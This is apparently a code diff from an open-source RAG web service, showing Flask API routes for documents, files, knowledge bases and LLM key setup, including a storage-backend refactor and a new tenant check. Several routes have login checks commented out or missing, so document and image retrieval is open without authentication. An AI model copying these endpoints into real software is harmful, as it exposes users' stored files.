||||
return get_data_error_result(
|
||||
retmsg="Can't find this knowledgebase!")
|
||||
|
||||
if DocumentService.query(name=req["name"], kb_id=kb_id):
|
||||
return get_data_error_result(
|
||||
retmsg="Duplicated document name in the same knowledgebase.")
|
||||
|
||||
doc = DocumentService.insert({
|
||||
"id": get_uuid(),
|
||||
"kb_id": kb.id,
|
||||
"parser_id": kb.parser_id,
|
||||
"parser_config": kb.parser_config,
|
||||
"created_by": current_user.id,
|
||||
"type": FileType.VIRTUAL,
|
||||
"name": req["name"],
|
||||
"location": "",
|
||||
"size": 0
|
||||
})
|
||||
return get_json_result(data=doc.to_json())
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/list', methods=['GET'])
|
||||
@login_required
|
||||
def list_docs():
|
||||
kb_id = request.args.get("kb_id")
|
||||
if not kb_id:
|
||||
return get_json_result(
|
||||
data=False, retmsg='Lack of "KB ID"', retcode=RetCode.ARGUMENT_ERROR)
|
||||
tenants = UserTenantService.query(user_id=current_user.id)
|
||||
for tenant in tenants:
|
||||
if KnowledgebaseService.query(
|
||||
tenant_id=tenant.tenant_id, id=kb_id):
|
||||
break
|
||||
else:
|
||||
return get_json_result(
|
||||
data=False, retmsg=f'Only owner of knowledgebase authorized for this operation.',
|
||||
retcode=RetCode.OPERATING_ERROR)
|
||||
keywords = request.args.get("keywords", "")
|
||||
|
||||
page_number = int(request.args.get("page", 1))
|
||||
items_per_page = int(request.args.get("page_size", 15))
|
||||
orderby = request.args.get("orderby", "create_time")
|
||||
desc = request.args.get("desc", True)
|
||||
try:
|
||||
docs, tol = DocumentService.get_by_kb_id(
|
||||
kb_id, page_number, items_per_page, orderby, desc, keywords)
|
||||
return get_json_result(data={"total": tol, "docs": docs})
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/infos', methods=['POST'])
|
||||
def docinfos():
|
||||
req = request.json
|
||||
doc_ids = req["doc_ids"]
|
||||
docs = DocumentService.get_by_ids(doc_ids)
|
||||
return get_json_result(data=list(docs.dicts()))
|
||||
|
||||
|
||||
@manager.route('/thumbnails', methods=['GET'])
|
||||
#@login_required
|
||||
def thumbnails():
|
||||
doc_ids = request.args.get("doc_ids").split(",")
|
||||
if not doc_ids:
|
||||
return get_json_result(
|
||||
data=False, retmsg='Lack of "Document ID"', retcode=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
try:
|
||||
docs = DocumentService.get_thumbnails(doc_ids)
|
||||
return get_json_result(data={d["id"]: d["thumbnail"] for d in docs})
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/change_status', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("doc_id", "status")
|
||||
def change_status():
|
||||
req = request.json
|
||||
if str(req["status"]) not in ["0", "1"]:
|
||||
get_json_result(
|
||||
data=False,
|
||||
retmsg='"Status" must be either 0 or 1!',
|
||||
retcode=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
try:
|
||||
e, doc = DocumentService.get_by_id(req["doc_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
e, kb = KnowledgebaseService.get_by_id(doc.kb_id)
|
||||
if not e:
|
||||
return get_data_error_result(
|
||||
retmsg="Can't find this knowledgebase!")
|
||||
|
||||
if not DocumentService.update_by_id(
|
||||
req["doc_id"], {"status": str(req["status"])}):
|
||||
return get_data_error_result(
|
||||
retmsg="Database error (Document update)!")
|
||||
|
||||
if str(req["status"]) == "0":
|
||||
ELASTICSEARCH.updateScriptByQuery(Q("term", doc_id=req["doc_id"]),
|
||||
scripts="ctx._source.available_int=0;",
|
||||
idxnm=search.index_name(
|
||||
kb.tenant_id)
|
||||
)
|
||||
else:
|
||||
ELASTICSEARCH.updateScriptByQuery(Q("term", doc_id=req["doc_id"]),
|
||||
scripts="ctx._source.available_int=1;",
|
||||
idxnm=search.index_name(
|
||||
kb.tenant_id)
|
||||
)
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/rm', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("doc_id")
|
||||
def rm():
|
||||
req = request.json
|
||||
doc_ids = req["doc_id"]
|
||||
if isinstance(doc_ids, str): doc_ids = [doc_ids]
|
||||
root_folder = FileService.get_root_folder(current_user.id)
|
||||
pf_id = root_folder["id"]
|
||||
FileService.init_knowledgebase_docs(pf_id, current_user.id)
|
||||
errors = ""
|
||||
for doc_id in doc_ids:
|
||||
try:
|
||||
e, doc = DocumentService.get_by_id(doc_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
tenant_id = DocumentService.get_tenant_id(doc_id)
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
|
||||
b, n = File2DocumentService.get_minio_address(doc_id=doc_id)
|
||||
|
||||
if not DocumentService.remove_document(doc, tenant_id):
|
||||
return get_data_error_result(
|
||||
retmsg="Database error (Document removal)!")
|
||||
|
||||
f2d = File2DocumentService.get_by_document_id(doc_id)
|
||||
FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
|
||||
File2DocumentService.delete_by_document_id(doc_id)
|
||||
|
||||
STORAGE_IMPL.rm(b, n)
|
||||
except Exception as e:
|
||||
errors += str(e)
|
||||
|
||||
if errors:
|
||||
return get_json_result(data=False, retmsg=errors, retcode=RetCode.SERVER_ERROR)
|
||||
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/run', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("doc_ids", "run")
|
||||
def run():
|
||||
req = request.json
|
||||
try:
|
||||
for id in req["doc_ids"]:
|
||||
info = {"run": str(req["run"]), "progress": 0}
|
||||
if str(req["run"]) == TaskStatus.RUNNING.value:
|
||||
info["progress_msg"] = ""
|
||||
info["chunk_num"] = 0
|
||||
info["token_num"] = 0
|
||||
DocumentService.update_by_id(id, info)
|
||||
# if str(req["run"]) == TaskStatus.CANCEL.value:
|
||||
tenant_id = DocumentService.get_tenant_id(id)
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
ELASTICSEARCH.deleteByQuery(
|
||||
Q("match", doc_id=id), idxnm=search.index_name(tenant_id))
|
||||
|
||||
if str(req["run"]) == TaskStatus.RUNNING.value:
|
||||
TaskService.filter_delete([Task.doc_id == id])
|
||||
e, doc = DocumentService.get_by_id(id)
|
||||
doc = doc.to_dict()
|
||||
doc["tenant_id"] = tenant_id
|
||||
bucket, name = File2DocumentService.get_minio_address(doc_id=doc["id"])
|
||||
queue_tasks(doc, bucket, name)
|
||||
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/rename', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("doc_id", "name")
|
||||
def rename():
|
||||
req = request.json
|
||||
try:
|
||||
e, doc = DocumentService.get_by_id(req["doc_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
if pathlib.Path(req["name"].lower()).suffix != pathlib.Path(
|
||||
doc.name.lower()).suffix:
|
||||
return get_json_result(
|
||||
data=False,
|
||||
retmsg="The extension of file can't be changed",
|
||||
retcode=RetCode.ARGUMENT_ERROR)
|
||||
for d in DocumentService.query(name=req["name"], kb_id=doc.kb_id):
|
||||
if d.name == req["name"]:
|
||||
return get_data_error_result(
|
||||
retmsg="Duplicated document name in the same knowledgebase.")
|
||||
|
||||
if not DocumentService.update_by_id(
|
||||
req["doc_id"], {"name": req["name"]}):
|
||||
return get_data_error_result(
|
||||
retmsg="Database error (Document rename)!")
|
||||
|
||||
informs = File2DocumentService.get_by_document_id(req["doc_id"])
|
||||
if informs:
|
||||
e, file = FileService.get_by_id(informs[0].file_id)
|
||||
FileService.update_by_id(file.id, {"name": req["name"]})
|
||||
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/get/<doc_id>', methods=['GET'])
|
||||
# @login_required
|
||||
def get(doc_id):
|
||||
try:
|
||||
e, doc = DocumentService.get_by_id(doc_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
|
||||
b, n = File2DocumentService.get_minio_address(doc_id=doc_id)
|
||||
response = flask.make_response(STORAGE_IMPL.get(b, n))
|
||||
|
||||
ext = re.search(r"\.([^.]+)$", doc.name)
|
||||
if ext:
|
||||
if doc.type == FileType.VISUAL.value:
|
||||
response.headers.set('Content-Type', 'image/%s' % ext.group(1))
|
||||
else:
|
||||
response.headers.set(
|
||||
'Content-Type',
|
||||
'application/%s' %
|
||||
ext.group(1))
|
||||
return response
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/change_parser', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("doc_id", "parser_id")
|
||||
def change_parser():
|
||||
req = request.json
|
||||
try:
|
||||
e, doc = DocumentService.get_by_id(req["doc_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
if doc.parser_id.lower() == req["parser_id"].lower():
|
||||
if "parser_config" in req:
|
||||
if req["parser_config"] == doc.parser_config:
|
||||
return get_json_result(data=True)
|
||||
else:
|
||||
return get_json_result(data=True)
|
||||
|
||||
if doc.type == FileType.VISUAL or re.search(
|
||||
r"\.(ppt|pptx|pages)$", doc.name):
|
||||
return get_data_error_result(retmsg="Not supported yet!")
|
||||
|
||||
e = DocumentService.update_by_id(doc.id,
|
||||
{"parser_id": req["parser_id"], "progress": 0, "progress_msg": "",
|
||||
"run": TaskStatus.UNSTART.value})
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
if "parser_config" in req:
|
||||
DocumentService.update_parser_config(doc.id, req["parser_config"])
|
||||
if doc.token_num > 0:
|
||||
e = DocumentService.increment_chunk_num(doc.id, doc.kb_id, doc.token_num * -1, doc.chunk_num * -1,
|
||||
doc.process_duation * -1)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
tenant_id = DocumentService.get_tenant_id(req["doc_id"])
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
ELASTICSEARCH.deleteByQuery(
|
||||
Q("match", doc_id=doc.id), idxnm=search.index_name(tenant_id))
|
||||
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/image/<image_id>', methods=['GET'])
|
||||
# @login_required
|
||||
def get_image(image_id):
|
||||
try:
|
||||
bkt, nm = image_id.split("-")
|
||||
response = flask.make_response(STORAGE_IMPL.get(bkt, nm))
|
||||
response.headers.set('Content-Type', 'image/JPEG')
|
||||
return response
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/upload_and_parse', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("conversation_id")
|
||||
def upload_and_parse():
|
||||
if 'file' not in request.files:
|
||||
return get_json_result(
|
||||
data=False, retmsg='No file part!', retcode=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
file_objs = request.files.getlist('file')
|
||||
for file_obj in file_objs:
|
||||
if file_obj.filename == '':
|
||||
return get_json_result(
|
||||
data=False, retmsg='No file selected!', retcode=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
doc_ids = doc_upload_and_parse(request.form.get("conversation_id"), file_objs, current_user.id)
|
||||
|
||||
return get_json_result(data=doc_ids)
|
||||
|
||||
@ -34,7 +34,7 @@ from api.utils.api_utils import get_json_result
|
||||
from api.utils.file_utils import filename_type
|
||||
from rag.nlp import search
|
||||
from rag.utils.es_conn import ELASTICSEARCH
|
||||
from rag.utils.minio_conn import MINIO
|
||||
from rag.utils.storage_factory import STORAGE_IMPL
|
||||
|
||||
|
||||
@manager.route('/upload', methods=['POST'])
|
||||
@ -98,7 +98,7 @@ def upload():
|
||||
# file type
|
||||
filetype = filename_type(file_obj_names[file_len - 1])
|
||||
location = file_obj_names[file_len - 1]
|
||||
while MINIO.obj_exist(last_folder.id, location):
|
||||
while STORAGE_IMPL.obj_exist(last_folder.id, location):
|
||||
location += "_"
|
||||
blob = file_obj.read()
|
||||
filename = duplicate_name(
|
||||
@ -116,7 +116,7 @@ def upload():
|
||||
"size": len(blob),
|
||||
}
|
||||
file = FileService.insert(file)
|
||||
MINIO.put(last_folder.id, location, blob)
|
||||
STORAGE_IMPL.put(last_folder.id, location, blob)
|
||||
file_res.append(file.to_json())
|
||||
return get_json_result(data=file_res)
|
||||
except Exception as e:
|
||||
@ -260,7 +260,7 @@ def rm():
|
||||
e, file = FileService.get_by_id(inner_file_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="File not found!")
|
||||
MINIO.rm(file.parent_id, file.location)
|
||||
STORAGE_IMPL.rm(file.parent_id, file.location)
|
||||
FileService.delete_folder_by_pf_id(current_user.id, file_id)
|
||||
else:
|
||||
if not FileService.delete(file):
|
||||
@ -296,7 +296,8 @@ def rename():
|
||||
e, file = FileService.get_by_id(req["file_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="File not found!")
|
||||
if pathlib.Path(req["name"].lower()).suffix != pathlib.Path(
|
||||
if file.type != FileType.FOLDER.value \
|
||||
and pathlib.Path(req["name"].lower()).suffix != pathlib.Path(
|
||||
file.name.lower()).suffix:
|
||||
return get_json_result(
|
||||
data=False,
|
||||
@ -331,8 +332,8 @@ def get(file_id):
|
||||
e, file = FileService.get_by_id(file_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
|
||||
response = flask.make_response(MINIO.get(file.parent_id, file.location))
|
||||
b, n = File2DocumentService.get_minio_address(file_id=file_id)
|
||||
response = flask.make_response(STORAGE_IMPL.get(b, n))
|
||||
ext = re.search(r"\.([^.]+)$", file.name)
|
||||
if ext:
|
||||
if file.type == FileType.VISUAL.value:
|
||||
@ -343,5 +344,28 @@ def get(file_id):
|
||||
'application/%s' %
|
||||
ext.group(1))
|
||||
return response
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/mv', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("src_file_ids", "dest_file_id")
|
||||
def move():
|
||||
req = request.json
|
||||
try:
|
||||
file_ids = req["src_file_ids"]
|
||||
parent_id = req["dest_file_id"]
|
||||
for file_id in file_ids:
|
||||
e, file = FileService.get_by_id(file_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="File or Folder not found!")
|
||||
if not file.tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
fe, _ = FileService.get_by_id(parent_id)
|
||||
if not fe:
|
||||
return get_data_error_result(retmsg="Parent Folder not found!")
|
||||
FileService.move_file(file_ids, parent_id)
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
@ -1,153 +1,162 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from elasticsearch_dsl import Q
|
||||
from flask import request
|
||||
from flask_login import login_required, current_user
|
||||
|
||||
from api.db.services import duplicate_name
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.db.services.file2document_service import File2DocumentService
|
||||
from api.db.services.file_service import FileService
|
||||
from api.db.services.user_service import TenantService, UserTenantService
|
||||
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
|
||||
from api.utils import get_uuid, get_format_time
|
||||
from api.db import StatusEnum, UserTenantRole, FileSource
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.db_models import Knowledgebase, File
|
||||
from api.settings import stat_logger, RetCode
|
||||
from api.utils.api_utils import get_json_result
|
||||
from rag.nlp import search
|
||||
from rag.utils.es_conn import ELASTICSEARCH
|
||||
|
||||
|
||||
@manager.route('/create', methods=['post'])
|
||||
@login_required
|
||||
@validate_request("name")
|
||||
def create():
|
||||
req = request.json
|
||||
req["name"] = req["name"].strip()
|
||||
req["name"] = duplicate_name(
|
||||
KnowledgebaseService.query,
|
||||
name=req["name"],
|
||||
tenant_id=current_user.id,
|
||||
status=StatusEnum.VALID.value)
|
||||
try:
|
||||
req["id"] = get_uuid()
|
||||
req["tenant_id"] = current_user.id
|
||||
req["created_by"] = current_user.id
|
||||
e, t = TenantService.get_by_id(current_user.id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Tenant not found.")
|
||||
req["embd_id"] = t.embd_id
|
||||
if not KnowledgebaseService.save(**req):
|
||||
return get_data_error_result()
|
||||
return get_json_result(data={"kb_id": req["id"]})
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/update', methods=['post'])
|
||||
@login_required
|
||||
@validate_request("kb_id", "name", "description", "permission", "parser_id")
|
||||
def update():
|
||||
req = request.json
|
||||
req["name"] = req["name"].strip()
|
||||
try:
|
||||
if not KnowledgebaseService.query(
|
||||
created_by=current_user.id, id=req["kb_id"]):
|
||||
return get_json_result(
|
||||
data=False, retmsg=f'Only owner of knowledgebase authorized for this operation.', retcode=RetCode.OPERATING_ERROR)
|
||||
|
||||
e, kb = KnowledgebaseService.get_by_id(req["kb_id"])
|
||||
if not e:
|
||||
return get_data_error_result(
|
||||
retmsg="Can't find this knowledgebase!")
|
||||
|
||||
if req["name"].lower() != kb.name.lower() \
|
||||
and len(KnowledgebaseService.query(name=req["name"], tenant_id=current_user.id, status=StatusEnum.VALID.value)) > 1:
|
||||
return get_data_error_result(
|
||||
retmsg="Duplicated knowledgebase name.")
|
||||
|
||||
del req["kb_id"]
|
||||
if not KnowledgebaseService.update_by_id(kb.id, req):
|
||||
return get_data_error_result()
|
||||
|
||||
e, kb = KnowledgebaseService.get_by_id(kb.id)
|
||||
if not e:
|
||||
return get_data_error_result(
|
||||
retmsg="Database error (Knowledgebase rename)!")
|
||||
|
||||
return get_json_result(data=kb.to_json())
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/detail', methods=['GET'])
|
||||
@login_required
|
||||
def detail():
|
||||
kb_id = request.args["kb_id"]
|
||||
try:
|
||||
kb = KnowledgebaseService.get_detail(kb_id)
|
||||
if not kb:
|
||||
return get_data_error_result(
|
||||
retmsg="Can't find this knowledgebase!")
|
||||
return get_json_result(data=kb)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/list', methods=['GET'])
|
||||
@login_required
|
||||
def list_kbs():
|
||||
page_number = request.args.get("page", 1)
|
||||
items_per_page = request.args.get("page_size", 150)
|
||||
orderby = request.args.get("orderby", "create_time")
|
||||
desc = request.args.get("desc", True)
|
||||
try:
|
||||
tenants = TenantService.get_joined_tenants_by_user_id(current_user.id)
|
||||
kbs = KnowledgebaseService.get_by_tenant_ids(
|
||||
[m["tenant_id"] for m in tenants], current_user.id, page_number, items_per_page, orderby, desc)
|
||||
return get_json_result(data=kbs)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/rm', methods=['post'])
|
||||
@login_required
|
||||
@validate_request("kb_id")
|
||||
def rm():
|
||||
req = request.json
|
||||
try:
|
||||
kbs = KnowledgebaseService.query(
|
||||
created_by=current_user.id, id=req["kb_id"])
|
||||
if not kbs:
|
||||
return get_json_result(
|
||||
data=False, retmsg=f'Only owner of knowledgebase authorized for this operation.', retcode=RetCode.OPERATING_ERROR)
|
||||
|
||||
for doc in DocumentService.query(kb_id=req["kb_id"]):
|
||||
if not DocumentService.remove_document(doc, kbs[0].tenant_id):
|
||||
return get_data_error_result(
|
||||
retmsg="Database error (Document removal)!")
|
||||
f2d = File2DocumentService.get_by_document_id(doc.id)
|
||||
FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
|
||||
File2DocumentService.delete_by_document_id(doc.id)
|
||||
|
||||
if not KnowledgebaseService.delete_by_id(req["kb_id"]):
|
||||
return get_data_error_result(
|
||||
retmsg="Database error (Knowledgebase removal)!")
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from elasticsearch_dsl import Q
|
||||
from flask import request
|
||||
from flask_login import login_required, current_user
|
||||
|
||||
from api.db.services import duplicate_name
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.db.services.file2document_service import File2DocumentService
|
||||
from api.db.services.file_service import FileService
|
||||
from api.db.services.user_service import TenantService, UserTenantService
|
||||
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
|
||||
from api.utils import get_uuid, get_format_time
|
||||
from api.db import StatusEnum, UserTenantRole, FileSource
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.db_models import Knowledgebase, File
|
||||
from api.settings import stat_logger, RetCode
|
||||
from api.utils.api_utils import get_json_result
|
||||
from rag.nlp import search
|
||||
from rag.utils.es_conn import ELASTICSEARCH
|
||||
|
||||
|
||||
@manager.route('/create', methods=['post'])
|
||||
@login_required
|
||||
@validate_request("name")
|
||||
def create():
|
||||
req = request.json
|
||||
req["name"] = req["name"].strip()
|
||||
req["name"] = duplicate_name(
|
||||
KnowledgebaseService.query,
|
||||
name=req["name"],
|
||||
tenant_id=current_user.id,
|
||||
status=StatusEnum.VALID.value)
|
||||
try:
|
||||
req["id"] = get_uuid()
|
||||
req["tenant_id"] = current_user.id
|
||||
req["created_by"] = current_user.id
|
||||
e, t = TenantService.get_by_id(current_user.id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Tenant not found.")
|
||||
req["embd_id"] = t.embd_id
|
||||
if not KnowledgebaseService.save(**req):
|
||||
return get_data_error_result()
|
||||
return get_json_result(data={"kb_id": req["id"]})
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/update', methods=['post'])
|
||||
@login_required
|
||||
@validate_request("kb_id", "name", "description", "permission", "parser_id")
|
||||
def update():
|
||||
req = request.json
|
||||
req["name"] = req["name"].strip()
|
||||
try:
|
||||
if not KnowledgebaseService.query(
|
||||
created_by=current_user.id, id=req["kb_id"]):
|
||||
return get_json_result(
|
||||
data=False, retmsg=f'Only owner of knowledgebase authorized for this operation.', retcode=RetCode.OPERATING_ERROR)
|
||||
|
||||
e, kb = KnowledgebaseService.get_by_id(req["kb_id"])
|
||||
if not e:
|
||||
return get_data_error_result(
|
||||
retmsg="Can't find this knowledgebase!")
|
||||
|
||||
if req["name"].lower() != kb.name.lower() \
|
||||
and len(KnowledgebaseService.query(name=req["name"], tenant_id=current_user.id, status=StatusEnum.VALID.value)) > 1:
|
||||
return get_data_error_result(
|
||||
retmsg="Duplicated knowledgebase name.")
|
||||
|
||||
del req["kb_id"]
|
||||
if not KnowledgebaseService.update_by_id(kb.id, req):
|
||||
return get_data_error_result()
|
||||
|
||||
e, kb = KnowledgebaseService.get_by_id(kb.id)
|
||||
if not e:
|
||||
return get_data_error_result(
|
||||
retmsg="Database error (Knowledgebase rename)!")
|
||||
|
||||
return get_json_result(data=kb.to_json())
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/detail', methods=['GET'])
|
||||
@login_required
|
||||
def detail():
|
||||
kb_id = request.args["kb_id"]
|
||||
try:
|
||||
tenants = UserTenantService.query(user_id=current_user.id)
|
||||
for tenant in tenants:
|
||||
if KnowledgebaseService.query(
|
||||
tenant_id=tenant.tenant_id, id=kb_id):
|
||||
break
|
||||
else:
|
||||
return get_json_result(
|
||||
data=False, retmsg=f'Only owner of knowledgebase authorized for this operation.',
|
||||
retcode=RetCode.OPERATING_ERROR)
|
||||
kb = KnowledgebaseService.get_detail(kb_id)
|
||||
if not kb:
|
||||
return get_data_error_result(
|
||||
retmsg="Can't find this knowledgebase!")
|
||||
return get_json_result(data=kb)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/list', methods=['GET'])
|
||||
@login_required
|
||||
def list_kbs():
|
||||
page_number = request.args.get("page", 1)
|
||||
items_per_page = request.args.get("page_size", 150)
|
||||
orderby = request.args.get("orderby", "create_time")
|
||||
desc = request.args.get("desc", True)
|
||||
try:
|
||||
tenants = TenantService.get_joined_tenants_by_user_id(current_user.id)
|
||||
kbs = KnowledgebaseService.get_by_tenant_ids(
|
||||
[m["tenant_id"] for m in tenants], current_user.id, page_number, items_per_page, orderby, desc)
|
||||
return get_json_result(data=kbs)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/rm', methods=['post'])
|
||||
@login_required
|
||||
@validate_request("kb_id")
|
||||
def rm():
|
||||
req = request.json
|
||||
try:
|
||||
kbs = KnowledgebaseService.query(
|
||||
created_by=current_user.id, id=req["kb_id"])
|
||||
if not kbs:
|
||||
return get_json_result(
|
||||
data=False, retmsg=f'Only owner of knowledgebase authorized for this operation.', retcode=RetCode.OPERATING_ERROR)
|
||||
|
||||
for doc in DocumentService.query(kb_id=req["kb_id"]):
|
||||
if not DocumentService.remove_document(doc, kbs[0].tenant_id):
|
||||
return get_data_error_result(
|
||||
retmsg="Database error (Document removal)!")
|
||||
f2d = File2DocumentService.get_by_document_id(doc.id)
|
||||
FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
|
||||
File2DocumentService.delete_by_document_id(doc.id)
|
||||
|
||||
if not KnowledgebaseService.delete_by_id(req["kb_id"]):
|
||||
return get_data_error_result(
|
||||
retmsg="Database error (Knowledgebase removal)!")
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
@ -1,205 +1,329 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from flask import request
|
||||
from flask_login import login_required, current_user
|
||||
from api.db.services.llm_service import LLMFactoriesService, TenantLLMService, LLMService
|
||||
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
|
||||
from api.db import StatusEnum, LLMType
|
||||
from api.db.db_models import TenantLLM
|
||||
from api.utils.api_utils import get_json_result
|
||||
from rag.llm import EmbeddingModel, ChatModel
|
||||
|
||||
|
||||
@manager.route('/factories', methods=['GET'])
|
||||
@login_required
|
||||
def factories():
|
||||
try:
|
||||
fac = LLMFactoriesService.get_all()
|
||||
return get_json_result(data=[f.to_dict() for f in fac if f.name not in ["Youdao", "FastEmbed"]])
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/set_api_key', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("llm_factory", "api_key")
|
||||
def set_api_key():
|
||||
req = request.json
|
||||
# test if api key works
|
||||
chat_passed = False
|
||||
factory = req["llm_factory"]
|
||||
msg = ""
|
||||
for llm in LLMService.query(fid=factory):
|
||||
if llm.model_type == LLMType.EMBEDDING.value:
|
||||
mdl = EmbeddingModel[factory](
|
||||
req["api_key"], llm.llm_name, base_url=req.get("base_url"))
|
||||
try:
|
||||
arr, tc = mdl.encode(["Test if the api key is available"])
|
||||
if len(arr[0]) == 0 or tc == 0:
|
||||
raise Exception("Fail")
|
||||
except Exception as e:
|
||||
msg += f"\nFail to access embedding model({llm.llm_name}) using this api key." + str(e)
|
||||
elif not chat_passed and llm.model_type == LLMType.CHAT.value:
|
||||
mdl = ChatModel[factory](
|
||||
req["api_key"], llm.llm_name, base_url=req.get("base_url"))
|
||||
try:
|
||||
m, tc = mdl.chat(None, [{"role": "user", "content": "Hello! How are you doing!"}], {
|
||||
"temperature": 0.9})
|
||||
if not tc:
|
||||
raise Exception(m)
|
||||
chat_passed = True
|
||||
except Exception as e:
|
||||
msg += f"\nFail to access model({llm.llm_name}) using this api key." + str(
|
||||
e)
|
||||
|
||||
if msg:
|
||||
return get_data_error_result(retmsg=msg)
|
||||
|
||||
llm = {
|
||||
